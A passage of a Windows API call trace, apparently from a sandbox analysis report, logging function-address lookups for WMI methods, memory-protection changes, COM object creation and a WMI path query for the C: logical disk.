OldAccessProtection=0x41e2d0*=0x4) returned 0x0 [0100.510] GetCurrentProcess () returned 0xffffffff [0100.510] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e298*=0x745f6098, NumberOfBytesToProtect=0x41e29c, NewAccessProtection=0x4, OldAccessProtection=0x41e2d0 | out: BaseAddress=0x41e298*=0x745f6000, NumberOfBytesToProtect=0x41e29c, OldAccessProtection=0x41e2d0*=0x2) returned 0x0 [0100.510] GetCurrentProcess () returned 0xffffffff [0100.510] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e298*=0x745f6098, NumberOfBytesToProtect=0x41e29c, NewAccessProtection=0x2, OldAccessProtection=0x41e2d0 | out: BaseAddress=0x41e298*=0x745f6000, NumberOfBytesToProtect=0x41e29c, OldAccessProtection=0x41e2d0*=0x4) returned 0x0 [0100.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ResetSecurity", cchWideChar=13, lpMultiByteStr=0x41e334, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ResetSecurity\x1amtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 13 [0100.513] GetProcAddress (hModule=0x745f0000, lpProcName="ResetSecurity") returned 0x745f24de [0100.522] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SetSecurity", cchWideChar=11, lpMultiByteStr=0x41e334, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetSecurity", lpUsedDefaultChar=0x0) returned 11 [0100.522] GetProcAddress (hModule=0x745f0000, lpProcName="SetSecurity") returned 0x745f2520 [0100.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServices", cchWideChar=18, lpMultiByteStr=0x41e330, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesmtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 18 [0100.531] GetProcAddress (hModule=0x745f0000, lpProcName="BlessIWbemServices") returned 0x745f1c69 [0100.579] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BlessIWbemServicesObject", cchWideChar=24, lpMultiByteStr=0x41e328, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BlessIWbemServicesObjectD\x1amtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 24 [0100.579] GetProcAddress (hModule=0x745f0000, lpProcName="BlessIWbemServicesObject") returned 0x745f1cbb [0100.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyHandle", cchWideChar=17, lpMultiByteStr=0x41e330, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyHandle\x1amtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 17 [0100.612] GetProcAddress (hModule=0x745f0000, lpProcName="GetPropertyHandle") returned 0x745f21b4 [0100.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WritePropertyValue", cchWideChar=18, lpMultiByteStr=0x41e330, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WritePropertyValuemtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 18 [0100.630] GetProcAddress (hModule=0x745f0000, lpProcName="WritePropertyValue") returned 0x745f2617 [0100.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x41e33c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1amtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 5 [0100.644] GetProcAddress (hModule=0x745f0000, lpProcName="Clone") returned 0x745f1d0d [0100.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VerifyClientKey", cchWideChar=15, lpMultiByteStr=0x41e330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VerifyClientKey", lpUsedDefaultChar=0x0) returned 15 [0100.655] GetProcAddress (hModule=0x745f0000, lpProcName="VerifyClientKey") returned 0x745f25b4 [0100.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetQualifierSet", cchWideChar=15, lpMultiByteStr=0x41e330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetQualifierSet", lpUsedDefaultChar=0x0) returned 15 [0100.661] GetProcAddress (hModule=0x745f0000, lpProcName="GetQualifierSet") returned 0x745f2215 [0100.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Get", cchWideChar=3, lpMultiByteStr=0x41e33c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Get", lpUsedDefaultChar=0x0) returned 3 [0100.662] GetProcAddress (hModule=0x745f0000, lpProcName="Get") returned 0x745f20d4 [0100.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Put", cchWideChar=3, lpMultiByteStr=0x41e33c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Put", lpUsedDefaultChar=0x0) returned 3 [0100.691] GetProcAddress (hModule=0x745f0000, lpProcName="Put") returned 0x745f22be [0100.721] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Delete", cchWideChar=6, lpMultiByteStr=0x41e33c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeletemtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 6 [0100.721] GetProcAddress (hModule=0x745f0000, lpProcName="Delete") returned 0x745f1f31 [0100.740] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetNames", cchWideChar=8, lpMultiByteStr=0x41e338, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetNamesD\x1amtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 8 [0100.741] GetProcAddress (hModule=0x745f0000, lpProcName="GetNames") returned 0x745f2182 [0100.787] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="BeginEnumeration", cchWideChar=16, lpMultiByteStr=0x41e330, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BeginEnumerationD\x1amtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 16 [0100.787] GetProcAddress (hModule=0x745f0000, lpProcName="BeginEnumeration") returned 0x745f1c43 [0100.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Next", cchWideChar=4, lpMultiByteStr=0x41e33c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NextD\x1amtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 4 [0100.796] GetProcAddress (hModule=0x745f0000, lpProcName="Next") returned 0x745f2283 [0100.813] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EndEnumeration", cchWideChar=14, lpMultiByteStr=0x41e334, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EndEnumerationmtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 14 [0100.814] GetProcAddress (hModule=0x745f0000, lpProcName="EndEnumeration") returned 0x745f1fc2 [0100.825] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyQualifierSet", cchWideChar=23, lpMultiByteStr=0x41e328, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyQualifierSet", lpUsedDefaultChar=0x0) returned 23 [0100.826] GetProcAddress (hModule=0x745f0000, lpProcName="GetPropertyQualifierSet") returned 0x745f21ff [0100.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Clone", cchWideChar=5, lpMultiByteStr=0x41e33c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Clone\x1amtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 5 [0100.844] GetProcAddress (hModule=0x745f0000, lpProcName="Clone") returned 0x745f1d0d [0100.845] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetObjectText", cchWideChar=13, lpMultiByteStr=0x41e334, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetObjectText\x1amtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 13 [0100.845] GetProcAddress (hModule=0x745f0000, lpProcName="GetObjectText") returned 0x745f219e [0100.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnDerivedClass", cchWideChar=17, lpMultiByteStr=0x41e330, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnDerivedClass\x1amtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 17 [0100.866] GetProcAddress (hModule=0x745f0000, lpProcName="SpawnDerivedClass") returned 0x745f2566 [0100.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SpawnInstance", cchWideChar=13, lpMultiByteStr=0x41e334, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SpawnInstance\x1amtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 13 [0100.878] GetProcAddress (hModule=0x745f0000, lpProcName="SpawnInstance") returned 0x745f257c [0100.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="GetPropertyOrigin", cchWideChar=17, lpMultiByteStr=0x41e330, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetPropertyOrigin\x1amtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 17 [0100.893] GetProcAddress (hModule=0x745f0000, lpProcName="GetPropertyOrigin") returned 0x745f21e9 [0100.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="DeleteMethod", cchWideChar=12, lpMultiByteStr=0x41e334, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeleteMethodD\x1amtêÇ_á\x94 tøåA", lpUsedDefaultChar=0x0) returned 12 [0100.948] GetProcAddress (hModule=0x745f0000, lpProcName="DeleteMethod") returned 0x745f1f44 [0100.989] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41eb68 | out: pAptType=0x41eb68*=1) returned 0x0 [0101.050] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41eb6c | out: ppvObject=0x41eb6c*=0x0) returned 0x80004002 [0101.051] IUnknown:Release (This=0x72015c) returned 0x0 [0101.089] GetProcAddress (hModule=0x76620000, lpProcName="IIDFromString") returned 0x76632ff2 [0101.089] IIDFromString (in: lpsz="{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}", lpiid=0x41e7c4 | out: lpiid=0x41e7c4) returned 0x0 [0101.090] GetProcAddress (hModule=0x76620000, lpProcName="CoGetClassObject") returned 0x766554ad [0101.090] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e4d8 | out: ppv=0x41e4d8*=0x6720810) returned 0x0 [0101.091] GetCurrentThreadId () returned 0xba4 [0101.091] ResetEvent (hEvent=0xb8) returned 1 [0101.091] GetCurrentThreadId () returned 0xba4 [0101.091] GetCurrentThreadId () returned 0xba4 [0101.091] GetCurrentThreadId () returned 0xba4 [0101.091] GetCurrentThreadId () returned 0xba4 [0101.091] ResetEvent (hEvent=0xb8) returned 1 [0101.091] GetCurrentThreadId () returned 0xba4 [0101.091] GetCurrentThreadId () returned 0xba4 [0101.091] SetEvent (hEvent=0xbc) returned 1 [0101.091] SetEvent (hEvent=0xb8) returned 1 [0101.091] CloseHandle (hObject=0x410) returned 1 [0101.397] GetCurrentThreadId () returned 0xba4 [0101.397] ResetEvent (hEvent=0xb8) returned 1 [0101.398] GetCurrentThreadId () returned 0xba4 [0101.398] GetCurrentThreadId () returned 0xba4 [0101.398] GetCurrentThreadId () returned 0xba4 [0101.398] GetCurrentThreadId () returned 0xba4 [0101.398] ResetEvent (hEvent=0xb8) returned 1 [0101.398] GetCurrentThreadId () returned 0xba4 [0101.398] GetCurrentThreadId () returned 0xba4 [0101.398] SetEvent (hEvent=0xbc) returned 1 [0101.398] SetEvent (hEvent=0xb8) returned 1 [0101.398] CloseHandle (hObject=0x420) returned 1 [0101.904] SysReAllocStringLen (in: pbstr=0x41d028*=0x0, psz="API-MS-Win-Core-LocalRegistry-L1-1-0.dll", len=0x28 | out: pbstr=0x41d028*="API-MS-Win-Core-LocalRegistry-L1-1-0.dll") returned 1 [0101.904] CharLowerBuffW (in: lpsz="API-MS-Win-Core-LocalRegistry-L1-1-0.dll", cchLength=0x28 | out: lpsz="api-ms-win-core-localregistry-l1-1-0.dll") returned 0x28 [0101.904] LoadLibraryExW (lpLibFileName="API-MS-Win-Core-LocalRegistry-L1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x76d30000 [0101.904] GetLastError () returned 0x0 [0101.907] GetProcAddress (hModule=0x76d30000, lpProcName="RegCreateKeyExW") returned 0x76d4865b [0101.910] GetProcAddress (hModule=0x76d30000, lpProcName="RegQueryValueExW") returned 0x76d41f4e [0101.918] GetProcAddress (hModule=0x76d30000, lpProcName="RegCloseKey") returned 0x76d4209f [0101.918] SysReAllocStringLen (in: pbstr=0x41d0a4*=0x0, psz="ntdll.dll", len=0x9 | out: pbstr=0x41d0a4*="ntdll.dll") returned 1 [0101.918] CharLowerBuffW (in: lpsz="ntdll.dll", cchLength=0x9 | out: lpsz="ntdll.dll") returned 0x9 [0101.919] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77c40000 [0101.919] GetProcAddress (hModule=0x77c40000, lpProcName="EtwRegisterTraceGuidsW") returned 0x77c7f843 [0101.920] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720810, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e6f0 | out: ppvObject=0x41e6f0*=0x0) returned 0x80004002 [0101.920] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6720810, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e704 | out: ppvObject=0x41e704*=0x6720820) returned 0x0 [0101.920] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=9, lpWideCharStr=0x41d448, cchWideChar=2047 | out: lpWideCharStr="ole32.dll") returned 9 [0101.920] SysReAllocStringLen (in: pbstr=0x41e44c*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x41e44c*="ole32.dll") returned 1 [0101.920] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0101.920] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0101.920] GetLastError () returned 0x0 [0101.921] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e438*=0x766214a0, NumberOfBytesToProtect=0x41e43c, NewAccessProtection=0x4, OldAccessProtection=0x41e470 | out: BaseAddress=0x41e438*=0x76621000, NumberOfBytesToProtect=0x41e43c, OldAccessProtection=0x41e470*=0x20) returned 0x0 [0101.921] GetCurrentProcess () returned 0xffffffff [0101.921] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e438*=0x766214a0, NumberOfBytesToProtect=0x41e43c, NewAccessProtection=0x20, OldAccessProtection=0x41e470 | out: BaseAddress=0x41e438*=0x76621000, NumberOfBytesToProtect=0x41e43c, OldAccessProtection=0x41e470*=0x4) returned 0x0 [0101.921] GetCurrentProcess () returned 0xffffffff [0101.921] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e438*=0x766214b0, NumberOfBytesToProtect=0x41e43c, NewAccessProtection=0x4, OldAccessProtection=0x41e470 | out: BaseAddress=0x41e438*=0x76621000, NumberOfBytesToProtect=0x41e43c, OldAccessProtection=0x41e470*=0x20) returned 0x0 [0101.922] GetCurrentProcess () returned 0xffffffff [0101.922] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e438*=0x766214b0, NumberOfBytesToProtect=0x41e43c, NewAccessProtection=0x20, OldAccessProtection=0x41e470 | out: BaseAddress=0x41e438*=0x76621000, NumberOfBytesToProtect=0x41e43c, OldAccessProtection=0x41e470*=0x4) returned 0x0 [0101.922] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e438*=0x766219a8, NumberOfBytesToProtect=0x41e43c, NewAccessProtection=0x4, OldAccessProtection=0x41e470 | out: BaseAddress=0x41e438*=0x76621000, NumberOfBytesToProtect=0x41e43c, OldAccessProtection=0x41e470*=0x20) returned 0x0 [0101.922] GetCurrentProcess () returned 0xffffffff [0101.922] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e438*=0x766219a8, NumberOfBytesToProtect=0x41e43c, NewAccessProtection=0x20, OldAccessProtection=0x41e470 | out: BaseAddress=0x41e438*=0x76621000, NumberOfBytesToProtect=0x41e43c, OldAccessProtection=0x41e470*=0x4) returned 0x0 [0101.923] GetCurrentProcess () returned 0xffffffff [0101.923] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e438*=0x766219ac, NumberOfBytesToProtect=0x41e43c, NewAccessProtection=0x4, OldAccessProtection=0x41e470 | out: BaseAddress=0x41e438*=0x76621000, NumberOfBytesToProtect=0x41e43c, OldAccessProtection=0x41e470*=0x20) returned 0x0 [0101.923] GetCurrentProcess () returned 0xffffffff [0101.923] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e438*=0x766219ac, NumberOfBytesToProtect=0x41e43c, NewAccessProtection=0x20, OldAccessProtection=0x41e470 | out: BaseAddress=0x41e438*=0x76621000, NumberOfBytesToProtect=0x41e43c, OldAccessProtection=0x41e470*=0x4) returned 0x0 [0101.923] GetCurrentProcess () returned 0xffffffff [0101.923] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e438*=0x76621a00, NumberOfBytesToProtect=0x41e43c, NewAccessProtection=0x4, OldAccessProtection=0x41e470 | out: BaseAddress=0x41e438*=0x76621000, NumberOfBytesToProtect=0x41e43c, OldAccessProtection=0x41e470*=0x20) returned 0x0 [0101.923] GetCurrentProcess () returned 0xffffffff [0101.923] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e438*=0x76621a00, NumberOfBytesToProtect=0x41e43c, NewAccessProtection=0x20, OldAccessProtection=0x41e470 | out: BaseAddress=0x41e438*=0x76621000, NumberOfBytesToProtect=0x41e43c, OldAccessProtection=0x41e470*=0x4) returned 0x0 [0101.924] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateFreeThreadedMarshaler") returned 0x7663e452 [0101.924] WbemDefPath:IUnknown:Release (This=0x6720810) returned 0x0 [0101.924] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720820, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e324 | out: ppvObject=0x41e324*=0x6720820) returned 0x0 [0101.925] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720820, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e2e0 | out: ppvObject=0x41e2e0*=0x0) returned 0x80004002 [0101.925] WbemDefPath:IUnknown:AddRef (This=0x6720820) returned 0x3 [0101.925] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720820, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dc3c | out: ppvObject=0x41dc3c*=0x0) returned 0x80004002 [0101.925] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720820, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dbec | out: ppvObject=0x41dbec*=0x0) returned 0x80004002 [0101.925] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720820, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dbf8 | out: ppvObject=0x41dbf8*=0x765018) returned 0x0 [0101.925] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x765018, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dc00 | out: pCid=0x41dc00*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0101.925] WbemDefPath:IUnknown:Release (This=0x765018) returned 0x3 [0101.926] GetProcAddress (hModule=0x76620000, lpProcName="CoGetContextToken") returned 0x7665ecab [0101.926] CoGetContextToken (in: pToken=0x41dc58 | out: pToken=0x41dc58) returned 0x0 [0101.926] CoGetContextToken (in: pToken=0x41e060 | out: pToken=0x41e060) returned 0x0 [0101.926] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720820, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e0f0 | out: ppvObject=0x41e0f0*=0x0) returned 0x80004002 [0101.926] WbemDefPath:IUnknown:Release (This=0x6720820) returned 0x2 [0101.926] WbemDefPath:IUnknown:Release (This=0x6720820) returned 0x1 [0101.926] CoGetContextToken (in: pToken=0x41e9e8 | out: pToken=0x41e9e8) returned 0x0 [0101.926] CoGetContextToken (in: pToken=0x41e948 | out: pToken=0x41e948) returned 0x0 [0101.926] WbemDefPath:IUnknown:QueryInterface (in: This=0x6720820, riid=0x41ea18*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41ea14 | out: ppvObject=0x41ea14*=0x6720820) returned 0x0 [0101.927] WbemDefPath:IUnknown:AddRef (This=0x6720820) returned 0x3 [0101.927] WbemDefPath:IUnknown:Release (This=0x6720820) returned 0x2 [0101.929] WbemDefPath:IWbemPath:SetText (This=0x6720820, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0101.929] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=12, lpWideCharStr=0x41d9cc, cchWideChar=2047 | out: lpWideCharStr="OLEAUT32.dll㾑矊?AA诔癶") returned 12 [0101.929] SysReAllocStringLen (in: pbstr=0x41e9d0*=0x0, psz="OLEAUT32.dll", len=0xc | out: pbstr=0x41e9d0*="OLEAUT32.dll") returned 1 [0101.929] CharLowerBuffW (in: lpsz="OLEAUT32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0101.929] LoadLibraryExA (lpLibFileName="OLEAUT32.dll", hFile=0x0, dwFlags=0x0) returned 0x76e40000 [0101.929] GetLastError () returned 0x0 [0101.930] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e41238, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x4, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x20) returned 0x0 [0101.930] GetCurrentProcess () returned 0xffffffff [0101.930] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e41238, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x20, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x4) returned 0x0 [0101.930] GetCurrentProcess () returned 0xffffffff [0101.930] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e41258, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x4, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x20) returned 0x0 [0101.931] GetCurrentProcess () returned 0xffffffff [0101.931] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e41258, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x20, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x4) returned 0x0 [0101.931] GetCurrentProcess () returned 0xffffffff [0101.931] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e41260, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x4, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x20) returned 0x0 [0101.931] GetCurrentProcess () returned 0xffffffff [0101.932] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e41260, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x20, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x4) returned 0x0 [0101.932] GetCurrentProcess () returned 0xffffffff [0101.932] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e41268, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x4, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x20) returned 0x0 [0101.932] GetCurrentProcess () returned 0xffffffff [0101.932] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e41268, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x20, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x4) returned 0x0 [0101.933] GetCurrentProcess () returned 0xffffffff [0101.933] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e9bc*=0x76e412c4, NumberOfBytesToProtect=0x41e9c0, NewAccessProtection=0x4, OldAccessProtection=0x41e9f4 | out: BaseAddress=0x41e9bc*=0x76e41000, NumberOfBytesToProtect=0x41e9c0, OldAccessProtection=0x41e9f4*=0x20) returned 0x0 [0101.933] GetCurrentProcess () returned 0xffffffff [0101.933] NtProtectVirtualMemory (in: 